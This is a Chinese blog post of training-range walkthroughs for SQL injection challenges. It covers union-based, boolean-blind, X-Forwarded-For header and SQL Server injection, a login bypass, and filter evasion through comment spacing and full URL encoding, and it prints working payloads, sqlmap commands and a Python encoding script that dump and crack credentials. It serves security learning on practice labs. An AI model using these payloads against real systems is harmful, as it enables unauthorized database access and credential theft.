暂停更新,没墨币了

SQL注入实战-MySQL

靶场地址:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe

  • 进入靶场发现URL为:http://url/show.php?id=MQo=,猜测此处需要将注入语句进行Base64编码
  • 判断注入点
-- 原语句: id=-1
id=LTE=  -- 页面返回空白,存在注入
  • 判断列数,可知列数为3
-- 原语句: id=1 order by 2
 id=MSBvcmRlciBieSAy   -- 页面正常
 
 -- 原语句: id=1 order by 3
 id=MSBvcmRlciBieSAz   -- 页面报错
  • 判断回显
-- 原语句: id=-1 union select 1,2
id=LTEgdW5pb24gc2VsZWN0IDEsMg==
  • 库名:test
-- 原语句: id=-1 union select 1,database()
id=LTEgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKQ==
  • 表名:data
-- 原语句: id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKQ==
  • 列名:id,title,main,thekey
-- 原语句: id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='data'
id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J2RhdGEn
  • 查看thekey字段内容,即可成功得到Key
-- 原语句: id=-1 union select 1,thekey from data
id=LTEgdW5pb24gc2VsZWN0IDEsdGhla2V5IGZyb20gZGF0YQ==

SQL注入漏洞测试(布尔盲注)

靶场地址:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe

  • 进入靶场,点击登录框下方的通知,进入通知页面
  • 判断注入点。分别修改id值,查看返回页面,判断此处存在注入点
?id=1 and 1=1 --+  -- 页面正常
?id=1 and 1=2 --+  -- 页面空白
  • 判断列数。使用order by判断,可知此处列数为4
id=1 order by 4 --+   -- 页面正常
id=1 order by 5 --+   -- 页面空白
  • 手工注入太慢了,我选择SQLMap
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1"  -DBMS=mysql
  • 库名:stormgroup
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql --current-db
  • 表名:member, notice
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql -D stormgroup --tables
  • member表中的字段:name, password, status
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql -D stormgroup -T member --columns
  • 字段内容。爆出2个账号,将第2个密码进行MD5解密后登陆即可获取Key
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql -D stormgroup -T member -C "name,password" --dump

X-Forwarded-For注入漏洞实战

靶场地址:https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe

  • 进入靶场,任意输入账号密码,点击登陆。发现页面提示IP已被记录,且从题目名可知此题为X-Forwarded-For的注入
  • 打开Burp,再次登录后抓取数据包,并将数据包发送到重发器Repeater
  • 手动添加X-Forwarded-For字段,点击发现。可以看到响应包的弹框中出现X-Forwarded-For字段设置的IP地址

X-Forwarded-For注入漏洞实战

  • 新建一个post.txt文件,将请求包全部内容粘贴到该文件中,并将X-Forwarded-For字段修改为*
POST /index.php HTTP/1.1
Host: 219.153.49.228:46500
Content-Length: 25
Cache-Control: max-age=0
Origin: http://219.153.49.228:46500
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://219.153.49.228:46500/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: *

username=123&password=123
  • 然后将post.txt文件放SQLMap的目录下,然后运行SQLMap,使用-r参数指定该txt
  • 库名:webcalendar
$ python sqlmap.py -r post.txt --current-db
  • 表名:user, login
$ python sqlmap.py -r post.txt -D webcalendar --tables
  • 列名:id, username, password
$ python sqlmap.py -r post.txt -D webcalendar -T user --columns
  • 爆字段内容
$ python sqlmap.py -r post.txt -D webcalendar -T user -C username,password --dump
  • 最后在登陆界面使用爆出来的账号密码登陆即可获取Key

SQL手工注入漏洞测试(MySQL数据库)

靶场地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

  • 进入靶场,点击登录框下方的通知,进入通知页面
  • 判断注入点
id=1 and 1=1  -- 页面正常
id=1 and 1=2  -- 页面错误
  • 判断列数,可知列数为4
id=1 order by 4  -- 页面正常
id=1 order by 5  -- 页面错误
  • 判断回显点。先让前面id=-1报错,从页面回显得知回显点为2、3
id=-1 union select 1,2,3,4
  • 爆库名:mozhe_Discuz_StormGroup
id=-1 union select 1,database(),3,4
  • 爆表名:StormGroup_member,notice
id=-1 union select 1,(select table_name from information_schema.tables  where table_schema=database() limit 0,1),3,4
id=-1 union select 1,(select table_name from information_schema.tables  where table_schema=database() limit 1,1),3,4
  • 猜第1个表中的列:id,name,password,status
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 0,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 1,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 2,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 3,1),3,4
  • 爆字段内容。此处一开始爆出的第1个密码经过MD5解密后登录提示用户被禁用,后使用limit爆出第2个账号及密码,解密后登录成功
id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1
id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1

SQL手工注入漏洞测试(MySQL数据库-字符型)

靶场地址:https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

  • 进入靶场,点击登录框下方的通知,进入通知页面
  • 判断注入点,此处为字符型注入
id=tingjigonggao' and 1=1 --+  -- 页面正常
id=tingjigonggao' and 1=2 --+  -- 页面错误
  • 判断列数,可知为4
id=tingjigonggao' order by 4 --+
id=tingjigonggao' order by 5 --+
  • 判断回显点。前面让id=x报错,从页面回显得知回显点为2、3
d=x' union select 1,2,3,4 --+
  • 库名:mozhe_discuz_stormgroup
id=x' union select 1,2,database(),4 --+
  • 表名:notice,stormgroup_member
id=x' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() --+
  • 判断stormgroup_member表的全部字段:id,name,password,status
id=x' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='stormgroup_member' --+
  • 查询name,password字段的值
d=x' union select 1,name,password,4 from stormgroup_member limit 0,1 --+
d=x' union select 1,name,password,4 from stormgroup_member limit 1,1 --+
  • 有2个账号,将第2个密码进行MD5解密后登陆即可获取Key

SQL手工注入漏洞测试(Sql Server数据库)

靶场地址:https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe

  • 进入靶场,点击登录框下方的通知,进入通知页面
  • 判断注入点。分别修改id值,查看返回页面,判断此处存在注入点
id=2-0  -- 返回正常
id=2-1  -- 返回错误
  • 判断列数。使用order by判断,可知此处列数为4
id=2 order by 4  -- 返回正常
id=2 order by 5  -- 返回错误

  • 判断回显。此处有以下3个地方需要注意

    • 需要先把前面的条件设为False,即id≠2,此处为id=-2
    • 使用union all select ,而非union select
    • 3个回显位为字符串型,需要用'3'
id=-2 union all select 1,2,'3',4
  • 查询当前数据库。库名:mozhe_db_v2
id=-2 union all select 1,db_name(),'3',4
  • 爆表,表名:manage
id=-2 union all select 1,(select top 1 name from mozhe_db_v2..sysobjects where xtype='u'),'3',4

-- 也可以使用information_schema.tables
id=-2 union all select 1,(select top 1 table_name from information_schema.tables),'3',4
  • 爆列,列名:id,username,password
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects),'3',4
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),2) from sysobjects),'3',4
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),3) from sysobjects),'3',4


-- 也可以使用information_schema.columns,但是使用前面的方便遍历
id=-2 union all select 1,(select  top 1 column_name from information_schema.columns where table_name='manage'),'3',4
  • 爆字段内容,使用第1条爆用户名为admin_mz,再使用第2条爆出密码
id=-2 union all select 1,(select username from manage),'3',4
id=-2 union all select 1,(select username from manage),(select password from manage where username='admin_mz'),4
  • 最后将用户名和MD5解密后的密码填入登录页,即可获取key

SQL过滤字符后手工绕过漏洞测试(万能口令)

靶场地址:https://www.mozhe.cn/bug/detail/VlhJTTJsUm9BSmFEQlE3SEpldDBIQT09bW96aGUmozhe

Emmm这题好水,居然还收2个墨币!
  • 根据提示输入用户名为admin,密码任意,点击登陆
  • 发现页面提示登陆失败,然后看了一下URL:http://url/no.php,然后改成yes.php,居然就显示Key了。。。

下面来一个正确的做法
  • 账号输入admin111'2222,密码随意,点击登陆
  • 页面报错如下:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2222','a','a') and password='1'' at line 1
  • 再次构造账号:admin','a','a') # ,密码任意。点击登陆成功获取Key

SQL过滤字符后手工注入漏洞测试(第1题)

靶场地址:https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

  • 进入靶场,点击登录框下方的通知,进入通知页面
  • 判断注入点
id=1   -- 页面正常
id=-1  -- 页面错误

  • 一开始直接判断列数,但是order by一直没有报错,后发现需要绕过。经查询得知此题绕过需要注意以下几点:

    • 空格用/**/代替,=like代替
    • id=1后面部分进行URL编码
  • 这里有个坑就是网上很多在线转换工具编码并不完全,很多英文字母没有进行编码。好不容易找到一款可以完全转16进制形式的ASCII的url编码工具,但是当我转一句爆库名的语句后直接给云盾拦截了,后来使用本地的小葵转换工具解决。没有的话可以用Python写一个小脚本,附一个别人写的脚本:
# !/usr/bin/env python
# -*- coding:UTF-8 -*-
# time:2019/11/9  1:03
# author:White9527
from urllib import parse
import re 
 
# 查询语句
s1 = "/**/order/**/by/**/1"
s2 = parse.quote(s1,"utf-8")
s3 = re.findall(r'.',s2)
j = 0 
for i in s3:
    if (s3[j]!='%' and s3[j-1]!='%' and s3[j-2]!='%'):
        s3[j] = hex(ord(s3[j]))
    j=j+1
s4 = "".join(s3)
s4 = re.sub("0x","%",s4)
print(s4)
  • 判断列数,可知列数为4
-- 原语句: id=1/**/order/**/by/**/4
id=1%2F%2A%2A%2F%6F%72%64%65%72%2F%2A%2A%2F%62%79%2F%2A%2A%2F%34  -- 页面正常
id=1%2F%2A%2A%2F%6F%72%64%65%72%2F%2A%2A%2F%62%79%2F%2A%2A%2F%35  -- 页面错误
  • 判断回显点。先让前面id=-1报错,从页面回显得知回显点为2、3
-- 原语句: id=-1/**/union/**/select/**/1,2,3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%64%61%74%61%62%61%73%65%28%29%2C%33%2C%34
  • 库名:mozhe_discuz_stormgroup
-- 原语句: id=-1/**/union/**/select/**/1,database(),3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%64%61%74%61%62%61%73%65%28%29%2C%33%2C%34
  • 表名:notice,stormgroup_member
-- 原语句: id=-1/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%74%61%62%6C%65%5F%6E%61%6D%65%29%2C%33%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%73%63%68%65%6D%61%2F%2A%2A%2F%6C%69%6B%65%2F%2A%2A%2F%64%61%74%61%62%61%73%65%28%29
  • stormgroup_member表中的字段名:id,name,password,status
-- 原语句: id=-1/**/union/**/select/**/1,(group_concat(column_name)),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'stormgroup_member'
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%28%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%63%6F%6C%75%6D%6E%5F%6E%61%6D%65%29%29%2C%33%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%63%6F%6C%75%6D%6E%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%6E%61%6D%65%2F%2A%2A%2F%6C%69%6B%65%2F%2A%2A%2F%27%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%27
  • 爆字段内容,一共有3个用户,第3个才是正确的
-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/0,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%30%2C%31

id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%31%2C%31

id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%32%2C%31

SQL过滤字符后手工注入漏洞测试(第2题)

靶场地址:https://www.mozhe.cn/bug/detail/RkxnbzB6WWpWWjBuTDEyamZXNmJiQT09bW96aGUmozhe

  • 进入靶场,点击登录框下方的通知,进入通知页面。
  • 判断注入点。
id=1   -- 页面正常
id=-1  -- 页面错误
  • 判断列数。可知列数为4
id=1/**/order/**/by/**/4  -- 页面正常
id=1/**/order/**/by/**/5  -- 页面错误
  • 判断回显。这里过滤了unionselect,尝试大小写绕过无效,于是使用URL编码
-- 原语句: id=-1/**/union/**/select/**/1,2,3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%33%2C%34
  • 库名:mozhe_discuz_stormgroup
-- 原语句: id=-1/**/union/**/select/**/1,2,database(),4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%64%61%74%61%62%61%73%65%28%29%2C%34
  • 表名:notice,stormgroup_member。这里使用group_concat()将表名拼接后返回
-- 原语句: id=-1/**/union/**/select/**/1,2,group_concat(table_name),4/**/from/**/information_schema.tables/**/where/**/table_schema/**/=/**/database()

id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%74%61%62%6C%65%5F%6E%61%6D%65%29%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%73%63%68%65%6D%61%2F%2A%2A%2F%3D%2F%2A%2A%2F%64%61%74%61%62%61%73%65%28%29
  • stormgroup_member表中的列名:id,length,name,password,time,status
-- 原语句: id=-1/**/union/**/select/**/1,2,group_concat(column_name),4/**/from/**/information_schema.columns/**/where/**/table_name/**/=/**/'stormgroup_member'

id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%63%6F%6C%75%6D%6E%5F%6E%61%6D%65%29%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%63%6F%6C%75%6D%6E%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%6E%61%6D%65%2F%2A%2A%2F%3D%2F%2A%2A%2F%27%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%27
  • 查看name,password字段内容,分别爆出3个账号:mozhe01,mozhe2,admin。将最后一个admin对应的密码MD5解密后即可成功登陆并获取Key
-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/0,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%30%2C%31

-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/1,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%31%2C%31

-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/2,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%32%2C%31

SQL过滤字符后手工注入漏洞测试(第3题)

靶场地址:https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe

  • 进入靶场,点击登录框下方的通知,进入通知页面。
  • 判断注入点,这里为字符型注入
id=1' and 1=1 --+   -- 页面正常
id=1' and 1=2 --+   -- 页面错误
  • 判断列数。可知列数为7
?id=1' order by 7 --+ -- 页面正常
?id=1' order by 8 --+ -- 页面错误
  • 判断回显。发现回显位置为:2,3,4
id=-1'  union select 1,2,3,4,5,6,7 --+
  • 库名:min_ju4t_mel1i
id=-1' union select 1,database(),3,4,5,6,7 --+
  • 表名:(@dmin9_td4b},notice,stormgroup_member,tdb_goods
id=-1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() --+
  • 这里发现第1个表名比较奇怪,看看这个表有什么列:id,username,password,status
id=-1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}' --+

  • 查看字段内容。这里一开始使用group_concat()函数,但是返回的密码不方便观察,干脆使用limit逐个返回。

    • Tips:这里一共有5个账号,前面4个的status字段均为0,只有最后一个的status1。猜测这个字段表示是否禁用。
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 0,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 1,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 2,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 3,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 4,1 --+
  • 最终通过MD5解密最后一个密码,成功登陆获取Key

版权属于:Naraku

本文链接:https://www.naraku.cn/posts/66.html

本站所有原创文章均采用 知识共享署名-非商业-禁止演绎4.0国际许可证 。如需转载请务必注明出处并保留原文链接,谢谢~

© 允许规范转载
如果觉得我的文章对你有帮助,请我吃颗糖吧~